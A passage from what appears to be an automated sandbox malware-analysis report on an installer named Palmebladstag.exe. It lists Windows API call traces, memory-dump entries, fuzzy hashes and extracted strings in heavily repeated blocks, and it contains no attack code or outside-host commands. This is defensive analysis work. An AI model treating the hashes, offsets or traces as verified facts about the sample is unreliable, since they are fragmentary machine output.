                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                            • String ID: %s=%s$NUL$[Rename]
                                            • API String ID: 3756836283-4148678300
                                            • Opcode ID: 1de46b7e02dacac8f40f5aab6e561ea10e9e82d90afa9c23760dfe6af979bb7e
                                            • Instruction ID: 703081f9f45e0959c07b6a00457515c8324f77790511a56e8ac0345a7c84fdf8
                                            • Opcode Fuzzy Hash: 1de46b7e02dacac8f40f5aab6e561ea10e9e82d90afa9c23760dfe6af979bb7e
                                            • Instruction Fuzzy Hash: 91412B71B04705AFD2206B249C49F6B7B6CEF89754F14053AFD01F62D2D678A8008EBD
                                            APIs
                                            • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                            • BeginPaint.USER32(?,?), ref: 00401047
                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                            • DeleteObject.GDI32(?), ref: 004010ED
                                            • CreateFontIndirectA.GDI32(?), ref: 00401105
                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                            • DrawTextA.USER32(00000000,007A1F00,000000FF,00000010,00000820), ref: 00401156
                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                            • DeleteObject.GDI32(?), ref: 00401165
                                            • EndPaint.USER32(?,?), ref: 0040116E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                            • String ID: F
                                            • API String ID: 941294808-1304234792
                                            • Opcode ID: 98e14e1640eb646ee3811aa623ba2e5d1e9cc6367b1deba79bcf05c34458357a
                                            • Instruction ID: dd0e79dd03d73333c37d03741989dce367d08c72bd534bd23d7a1991bc4c48e1
                                            • Opcode Fuzzy Hash: 98e14e1640eb646ee3811aa623ba2e5d1e9cc6367b1deba79bcf05c34458357a
                                            • Instruction Fuzzy Hash: E5419A71804249AFCB058F95CD459BFBFB9FF45310F00812AF962AA1A0C738EA51DFA5
                                            APIs
                                            • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Palmebladstag.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,76233410,0040329C), ref: 00405E3A
                                            • CharNextA.USER32(?,?,?,00000000), ref: 00405E47
                                            • CharNextA.USER32(?,"C:\Users\user\Desktop\Palmebladstag.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,76233410,0040329C), ref: 00405E4C
                                            • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,76233410,0040329C), ref: 00405E5C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: Char$Next$Prev
                                            • String ID: "C:\Users\user\Desktop\Palmebladstag.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                            • API String ID: 589700163-2613802115
                                            • Opcode ID: 2024885374f02dac88d9fb103eccae40028a2ab1d30660e2dcec4d8ea4488381
                                            • Instruction ID: 982ed4f0ea0d1ffb3a75412ce8e95c0ea6245537b44222f6b90d7ae264b7a878
                                            • Opcode Fuzzy Hash: 2024885374f02dac88d9fb103eccae40028a2ab1d30660e2dcec4d8ea4488381
                                            • Instruction Fuzzy Hash: 7511B671804B9129EB3217248C44B776F98CB9A7A0F18047BE5C5723C2C67C5E828EED
                                            APIs
                                            • GetWindowLongA.USER32(?,000000EB), ref: 00403F0B
                                            • GetSysColor.USER32(00000000), ref: 00403F27
                                            • SetTextColor.GDI32(?,00000000), ref: 00403F33
                                            • SetBkMode.GDI32(?,?), ref: 00403F3F
                                            • GetSysColor.USER32(?), ref: 00403F52
                                            • SetBkColor.GDI32(?,?), ref: 00403F62
                                            • DeleteObject.GDI32(?), ref: 00403F7C
                                            • CreateBrushIndirect.GDI32(?), ref: 00403F86
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                            • String ID:
                                            • API String ID: 2320649405-0
                                            • Opcode ID: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                            • Instruction ID: 43f1f9eadd2e023582460ec461a07703dc87d5103ca70cdaf59bc9c3c4c10c95
                                            • Opcode Fuzzy Hash: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                            • Instruction Fuzzy Hash: B1219971904705AFC7219F68DD08B5BBFF8AF01715F04852AF995E22D1C378E944CB55
                                            APIs
                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026E1
                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026FD
                                            • GlobalFree.KERNEL32(?), ref: 00402736
                                            • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402748
                                            • GlobalFree.KERNEL32(00000000), ref: 0040274F
                                            • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402767
                                            • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040277B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                            • String ID:
                                            • API String ID: 3294113728-0
                                            • Opcode ID: 6ed529cddf8fe9e20862fe3dc79e756ecbbe1f2e231e8846bbc0d11758eb4e58
                                            • Instruction ID: 94283e328d35fee59e2da4f8035aa06736476ebf885dd15e4876c46effbb42d0
                                            • Opcode Fuzzy Hash: 6ed529cddf8fe9e20862fe3dc79e756ecbbe1f2e231e8846bbc0d11758eb4e58
                                            • Instruction Fuzzy Hash: E4319171C00128BBCF216FA5DD89DAE7E79EF05364F20423AF520762E1C7791D408BA9
                                            APIs
                                            • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040476A
                                            • GetMessagePos.USER32 ref: 00404772
                                            • ScreenToClient.USER32(?,?), ref: 0040478C
                                            • SendMessageA.USER32(?,00001111,00000000,?), ref: 0040479E
                                            • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004047C4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: Message$Send$ClientScreen
                                            • String ID: f
                                            • API String ID: 41195575-1993550816
                                            • Opcode ID: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                            • Instruction ID: 6bd71cb3d479751b3b69d93d67c88433f783f46e4abb255f82c81c082e4bdd88
                                            • Opcode Fuzzy Hash: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                            • Instruction Fuzzy Hash: C5014075D00218BADB01DBA4DC45FFEBBBCAB55711F10412BBB10B71C0C7B865018BA5
                                            APIs
                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B67
                                            • MulDiv.KERNEL32(0007D8AB,00000064,0007D8AF), ref: 00402B92
                                            • wsprintfA.USER32 ref: 00402BA2
                                            • SetWindowTextA.USER32(?,?), ref: 00402BB2
                                            • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BC4
                                            Strings
                                            • verifying installer: %d%%, xrefs: 00402B9C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: Text$ItemTimerWindowwsprintf
                                            • String ID: verifying installer: %d%%
                                            • API String ID: 1451636040-82062127
                                            • Opcode ID: b2596dc42376c4ed7c7376505dbeede42f27e887c2baf36158ddba7532441070
                                            • Instruction ID: 338c4dd4cc7a1f9a3f94f7e8e9aba01fa07f8a2d27e46d6da828e47d9d426f75
                                            • Opcode Fuzzy Hash: b2596dc42376c4ed7c7376505dbeede42f27e887c2baf36158ddba7532441070
                                            • Instruction Fuzzy Hash: 32014F70540208ABEF249F61DD0AEAE37B9AB00304F00803AFA06A92D1D7B9A9518B59
                                            APIs
                                            • GetDC.USER32(?), ref: 00401D29
                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D36
                                            • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D45
                                            • ReleaseDC.USER32(?,00000000), ref: 00401D56
                                            • CreateFontIndirectA.GDI32(0040AFA0), ref: 00401DA1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                            • String ID: Calibri
                                            • API String ID: 3808545654-1409258342
                                            • Opcode ID: 10637d541ef3879d8a963b1bc799244cab246a7eb505250814fc48b41073f8ce
                                            • Instruction ID: 4f22f7d967d41569425e1cc72a43e48c322de2a0bc5ea7779ffcdbaac11077e3
                                            • Opcode Fuzzy Hash: 10637d541ef3879d8a963b1bc799244cab246a7eb505250814fc48b41073f8ce
                                            • Instruction Fuzzy Hash: 760162B1958341AFE7015BB0AE1ABAF7F74A725705F100439F145BA2E2C67C14158B2B
                                            APIs
                                            • lstrlenA.KERNEL32(Brandbltets Setup: Completed,Brandbltets Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,0040458D,000000DF,0000040F,00000400,00000000), ref: 004046FB
                                            • wsprintfA.USER32 ref: 00404703
                                            • SetDlgItemTextA.USER32(?,Brandbltets Setup: Completed), ref: 00404716
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: ItemTextlstrlenwsprintf
                                            • String ID: %u.%u%s%s$Brandbltets Setup: Completed
                                            • API String ID: 3540041739-3321802342
                                            • Opcode ID: c05fa8be11490d7cb84ca254aa500086e51f8ccad523902aef9d714a726957f5
                                            • Instruction ID: 808364b1aeea65b13bf83ed040d55ad759ad6ec36480b824a7a4bb04bc91d3c3
                                            • Opcode Fuzzy Hash: c05fa8be11490d7cb84ca254aa500086e51f8ccad523902aef9d714a726957f5
                                            • Instruction Fuzzy Hash: 8B1108736002243BDB0065699C06EEF329DDBC3375F14023BFA29F61D1E9799C5182E9
                                            APIs
                                            • GetDlgItem.USER32(?), ref: 00401CD0
                                            • GetClientRect.USER32(00000000,?), ref: 00401CDD
                                            • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401CFE
                                            • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D0C
                                            • DeleteObject.GDI32(00000000), ref: 00401D1B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                            • String ID:
                                            • API String ID: 1849352358-0
                                            • Opcode ID: 8718ef474664ef02fb2026f6f5ca2eb5ae4bcb4a29c0f9619d4f19e816921c64
                                            • Instruction ID: 7c3280a60d84a3596340f685d6ada4bc9ba3972ea03b1155ec5ca5a37b5200ea
                                            • Opcode Fuzzy Hash: 8718ef474664ef02fb2026f6f5ca2eb5ae4bcb4a29c0f9619d4f19e816921c64
                                            • Instruction Fuzzy Hash: 01F04FB2905104AFD701EBA4EE88CAFB7BCEB44301B004476F601F2091C638AD018B79
                                            APIs
                                            • SetWindowTextA.USER32(00000000,007A1F00), ref: 0040397F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: TextWindow
